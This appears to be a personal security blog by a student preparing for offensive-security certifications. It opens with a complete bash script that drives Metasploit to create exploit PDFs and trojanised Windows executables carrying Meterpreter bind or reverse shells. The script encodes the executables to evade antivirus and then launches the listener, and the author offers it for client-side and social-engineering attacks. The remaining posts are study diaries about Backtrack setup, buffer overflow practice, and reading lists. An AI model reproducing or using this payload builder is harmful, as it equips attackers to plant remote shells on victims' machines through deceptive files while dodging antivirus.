Bash Scripts

I have been practicing more metasploit and bash scripting.  I came up with a quick script for client side exploits.  It is not mind blowing or anything, but it is nice for a quick file with SE. It encodes enough to get past most AV and will start the multi handler to accept incoming/outgoing connections.  I am sure to add to it later but this is just a starting point.  Have to start somewhere....



#! /bin/sh

#This will create a "special" payload for you. Helps when you want to create Meterpreter files fast.... 

echo "Do you need a pdf or exe 'special' payload?"
read special
if [ $special == "pdf" ]; then
    echo "What is the pdf payload, bind_tcp or reverse_tcp?"
    read Payload
    echo "Remember: This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3."
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME=/root/pdf_metasploit/$pdf_file PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/pdf_metasploit/
        echo "What name do you want to use for the PDF?"
        read pdf_file
        msfcli exploit/windows/fileformat/adobe_libtiff FILENAME=/root/pdf_metasploit/$pdf_file PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi

elif [ $special == "exe" ]; then
echo "Do you want the file to execute the payload in a separate process? Yes or No?"
read answer
if [ $answer == "Yes" ] || [ $answer == "yes" ]; then
    echo "What is the exe payload, bind_tcp or reverse_tcp?"
    read Payload
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT=$Port -k -x /root/exe_template/$exefile > /root/Desktop/bind.exe
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E           
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will connect to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST=$lhostip LPORT=$Port -i 18 -k -x /root/exe_template/$exefile > /root/Desktop/reverse.exe   
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi

elif [ $answer == "No" ] || [ $answer == "no" ]; then
    echo "What is the exe payload, bind_tcp or reverse_tcp?"
    read Payload
    if [ $Payload == "bind_tcp" ]; then
        echo "What is the rhost IP address?"         
        read rhostip
        echo "What is the port we will bind to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/bind_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' -i 18 LPORT=$Port -x /root/exe_template/$exefile > /root/Desktop/bind.exe
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=$Port RHOST=$rhostip E           
       
    elif [ $Payload == "reverse_tcp" ]; then
        echo "What is the lhost IP address?"         
        read lhostip
        echo "What is the port we will connect to?"         
        read Port
        ls /root/exe_template/
        echo "Which exe template do you want to use?"
        read exefile
        msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -b '\x00\x20' LHOST=$lhostip LPORT=$Port -i 18 -x /root/exe_template/$exefile > /root/Desktop/reverse.exe   
        msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$Port LHOST=$lhostip E
    else
        echo "Did not recognize you response. Please run script again. "
    fi
else
    echo "Did not recognize you response. Please run script again. "
fi

else
    echo "Did not recognize you response. Please run script again. "
fi

Backtrack 5 R1

Finished installing Backtrack 5 R1 on the laptop on the SSD drive.  Just to note, I tried.  I tried to use KDE once more and I just cannot do it.  Basket note pads is enough to make anyone who has used it switch but it just wasn't enough.  The GUI just seems cleaner and less of a headache to use.  I am the first person to try to do something the hard way.  Trust me, ask anyone, but it just did not make any sense to me.  It should be more intuitive to use KDE and it just isn't.  I am not in the GUI all the time but when I am, it should be an easy experience.  Why else even use the GUI in the first place.

Anyway, enough of that.  It was great that they did an update to Backtrack 5 since the DNS plugin bug was a bit of a problem.  I found out later that it was only for the x64 bit versions.  That is what I get for rushing to x64 bit.  Also, it is the reason that I simply did not do the "apt-get update && apt-get upgrade && apt-get dist-upgrade".  I installed R1 pretty quickly since they have made the grub installation seamless.  It always finds my Windows installation and configures the dual-boot perfectly.  Definitely a big plus.  On to the Nvidia drivers which was easy enough once you can get the nouveau drivers from loading.  I use the site: "https://wiki.ubuntu.com/X/Troubleshooting/Nouveau".  I was able to CTRL+ALT+BACKSPACE and run the executable.  Sidenote, I love how easy that it to configure in Gnome: System -> Preferences -> Keyboard -> Layouts -> Options -> Key Sequence to kill the X server.  Wonderful. Shot-out to Muts.  I like to add compiz, what can I say.  I cannot help it.  It adds a even bigger cool factor.

Next, I added the usual addons for Firefox after I upgraded it.  Added Chrome and tsclient.  I updated wireshark to 1.7.0 and updated metasploit 4.0 (the usual command svn up).  However, wireshark was a little more complicated.  I found the page "samiux.blogspot.com/2011_07_01_archive.html".  It was very helpful in the install.  Next, I installed VMware Workstation 7 on R1.  Of course, it did not work with the updated kernel on R1.  Luckily, I found the site: "weltall.heliohost.org/wordpress/2011/05/14/running-vmware-workstation-player-on-linux-2-6-39-updated/".  I was able to get VMware running in 2 seconds.  Sweet.  I know I will need that during the OSCE course.  Next, test it with the Alfa wireless adapter.  No problem there.  Next, remove the splash screen during boot-up.   Sometimes, you do not want everyone seeing a big red screen saying Backtrack 5.  Open up VIM and editing grub.cfg took care of that.

It has been a great install on the laptop.  I am sure I will add more to this post later but I just had to say how good Backtrack 5 R1 has been.  Every Linux install has its hiccups but the finished product is what counts.  This is a pretty good end product when you think of what it is suppose to be used for.  It is not OS X or Windows so you will not hear me complain.  Just saying.

Offensive Security Wireless Professional: OSWP (Post 1)

I am not posting as much as I want on this blog, but I am still giving it a shot.  I just want to recap the past few weeks, I have been preparing for the OSCE course by using exploits in Exploit-DB and re-writing them, from fuzzing to new python scripts to a shell prompt.  It has been fun time.  I was able to install VMware Workstation 7 on BackTrack 5 x64 Gnome.  I have two virtual machines to work on buffer overflows, windows xp sp2 and sp3.  I also have my desktop that has more virtual machines.  That will be essential for the OSCE course I am sure. 

I have also been increasing my reading.  I have been reading "Ghost in the Wires", "Fuzzing", "Shellcoder's Handbook", "Metasploit: Penetration Tester's Guide" and "KingPin".  All of these books are great reads.  I have not finished "Ghost in the Wires" yet but it definitely has my attention.  Kevin Mitnick, Dave Kennedy, HD Moore and Joe McCray are probably my favorite pentesters/hackers. 

In addition, I have started another Offensive Security course: OSWP!!  I ordered the wireless adapter, ALFA AWUS036H.  I have heard good things about the adapter from the EthicalHacker.Net forum.  On the BackTrack 5 forum, there are instructions on loading the Realtek drivers for packet injection.  I am so excited.  Also, I have a Linksys WRT54G wireless access point.  I have registered for the class but I will be paying for it tomorrow.  Hopefully, I can get the PDF's and videos over the weekend.  I will be posting reviews of the modules and the exam as I go.  Nothing too detailed of course ;-).  When I took the OSCP course, I had a great time learning and I do not expect any less from this course. At least, this time, the exam is only 4 hours. :-).  I have been reading www.aircrack-ng.org for awhile now, but never really tried out cracking WEP or WPA.  I foresee a lot of that from now on.  People still use WEP and weak preshared keys for WPA/WPA2.  This will increase my ability to choose a different attack vector during a penetration test.

BackTrack WiFu Online

More Buffer Overflows

It has been over a month since my last post.  It has been a really busy time.  When they say the most important resource is time, they are not kidding.  Anyway, in that time I have continuing to go to exploitdb to practice.  I was able to get some basic stack overflows going on two software ftp programs, easyftp and war-ftpd.  I have been using a test OS of Windows XP SP3.  Most of the exploits seem to center around Win XP SP2.  It would be better to try different service packs I guess.  Next, I want to find more SEH exploits.  This was fun trying to figure how to jump around in the stack.  Again, go to http://www.corelan.be/ for information about buffer overflows and infosec in general.  Great stuff.  With easyftp, I was only able to fit the "net user add" payload.  Mannnn, it was a small buffer space.  However, in war-ftpd, the buffer was much larger and I was able to fit a Windows reverse shell.  I have to say, reverse shell is the best.  Just a side note, I have noticed that I have had a lot of success when the payload is encoded in "ShikataGaNai".  It might help someone else so I figured I would mention it. 

Just in case, you thought I let it go, nope.  Paper is still on.  Of course, the new hacker groups that have come out have made this an excellent paper to write.  ;-) I mean I thought of this before two groups even came out in the media.  Not that they were not there the whole time.  I just more time to get the thoughts together and more anecdotal evidence to make it more credible.  With everything that is going on, I should probably just post it by the end of the year so I can get all the probable hacks that will come recorded. 

Buffer Overflows

It has been a while since I posted anything.   It has been a busy time.  I have been able to sneak in some time to work on my OffSec skills.  Hey I am working on it.  Anyway, to prepare for the OSCE course, I am looking through the 'www.exploit-db.com' site and trying to re-exploit applications that are available using python.  I like python a lot and trying to get better at it currently so it looked like the obvious choice.  I am running into some confusion on the Savant 3.1 Web Server.  I understand that when exploiting SEH, we are looking for a POP, POP, return.  I understand that when you have a stack exploit, you look for a JMP into a CPU register.  But somehow, I am getting lost on the POP, RET.  Is it just the same logic behind SEH?  Are we just popping the last entry in the stack and putting the last memory entry in EIP? I have reviewed the exploit code from "http://www.exploit-db.com/exploits/10434/".  Also, there is a great tutorial for EggHunters and Buffer Overflows at "http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html".  Just a side note, this blog has helped me in the past understand SEH exploits along with the site "https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/".   That site is incredible too.  If you want to know about buffer overflows, these are the sites to go to.  Anyway, I am kind of stuck right now, but the irony is that the person who found the vulnerability to Savant is Muts, teacher and founder of OffSec of OSCP and OSCE courses.  I know I have a lot of learning in store for me with the OSCE.  Hopefully, I can get some more headway with this.  On a more depressing note, I am sure I cannot afford any big CONs this year like I planned if I want to get the OSCE course and move by next year.  But the good news, I am sure there will be great CONs then too.

Education: 2011

I have been gathering, watching and reading more and more info-sec data from everywhere including great books, from Amazon of course and it has been helping a lot.  I just wanted to mention some of the things I have been using to learn, just in case you are starting out like me.  Most of the information has been leaning towards social engineering and browser exploits.  For example, if you start looking at enough YouTube clips of DefCons and presentations by the elite security researchers and pentesters, you learn that nowadays, most attacks are done on layer 7 and 8 of the OSI model. The recent Playstation PSN hack was reported to have started from a Spear Phishing attack.  It seems that a little social engineering goes a long way.  All it takes is one click.  Depending on the vulnerability, it might even be easier.  With SQLi and XSS, you can move the browser for your victim to introduce an exploit.  A user is directed to the wrong page or opens the wrong email.  It can happen and it obviously does.  Ask Sony.  Here is my list:

Books:
Dissecting the Hack: The Forb1dd3n Network (Half way done)
Python Network Programming (Just beginning)
Social Engineering: The Art of Human Hacking (Just bought)
KingPin (Just bought)
Fuzzing: Brute Force Vulnerability Discovery (Just bought)
The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws
(Just beginning)

Videos:
Elearning Security
Malware Analysis - http://youtu.be/fqf5LfPwmm4
Malware Analysis - http://youtu.be/jake9ibMIpc

Joe McCray
PenTesting - http://www.youtube.com/watch?v=tJsNu0VRKYY
Advanced SQL Injection - http://www.youtube.com/watch?v=rdyQoUNeXSg
Advanced SQL Injection (LayerOne 2009) http://www.youtube.com/watch?v=WkHkryIoLD0

Sam Kamkar
Hacking Facebook/PHP - http://www.youtube.com/watch?v=fEmO7wQKCMw&feature=related

IronGeek (Adrian Crenshaw)
Numberous Videos -*.*- http://www.irongeek.com/i.php?page=security/hackingillustrated
Dakykilla, Purehate and Irongeek
Password Exploitation Class - http://www.irongeek.com/i.php?page=videos/password-exploitation-class

SecurityTube
Numberous Videos -*.*- http://www.securitytube.net/

Python Programming
Computer Science Class - http://www.cse.msu.edu/~cse231/PracticeOfComputingUsingPython/index.php



Member of EthicalHacker.net
PenTesting Steps  - http://www.infiltrated.net/pentesting101.html


EthicalHacker
Great Forum w/ videos,links,articles for Pentesting - http://ethicalhacker.net

Hopefully, this helps other people in the quest for knowledge.  Good Night

Education: 2011

I just wanted to make a quick post about my studies for this year.  I plan on taking a few courses and certification exams this year, like any other year really. I have been slowly preparing to be a better security and IT professional for my company and for myself.  There is a lot of great information out there to learn if anyone is willing to put in the time and energy.  Anyway, so far, I have taken two exams already.  The first, OSCP, was very exciting, informative, fun and difficult.  I will include a review about it in a later post which it definitely deserves.  The next exam was the CASP exam which is targeted to be the next "level" from the Security+ exam.  It was a free beta exam so I figured why not.  It was a little difficult since it hit on topics I have not researched before.  It still just seems like a waste of time compare to an exam like the OSCP which is more hands-on.

The remaining two exams for this year are the OSCE and CCNA.  The OSCE is the next course of the OffSec group after the OSCP.  I must say, I am dying to take this course.  I know it can take me to that next stage of offensive security such as evading anti-virus, attacking web applications, buffer overflows with staged exploits and writing in assembly language.  It will be a painfully exciting time I am sure.  Finally, I will take the CCNA exam.  I have put this off for years now.  I just want to get it out of the way to be honest.  I am just having a hard time getting my hands on either the Cisco IOSs' or the Cisco hardware.  The hardware would cost more than the exam.  I tried to go the cheaper route by using the cisco emulator GNS3.  Of course, you need to be able to get a copy of the IOS.  FAIL.  I do not have access to the IOSs' yet.  Legally anyway.  I will end up just buying the hardware.  If you see late night flashes of light and power surges going in your neighborhood, it is probably because I live near you.  I have seen some good deals on ebay and ciscokits.com.  Oh, before I forget, I am also practicing programming in python. It seems to be great when you want to do network programming.  I am just using homework assignments from computer science courses on the Internet to practice.  It seems to be working.  I will post as I go along.  Good Night...


OSCP: Offensive Security Certified Professional
OSCE: Offensive Security Certified Expert
CCNA: Cisco Certified Network Associate
CASP: CompTIA Advanced Security Practitioner
OSWP: Offensive Security Wireless Professional
GPEN: GIAC Certified Penetration Tester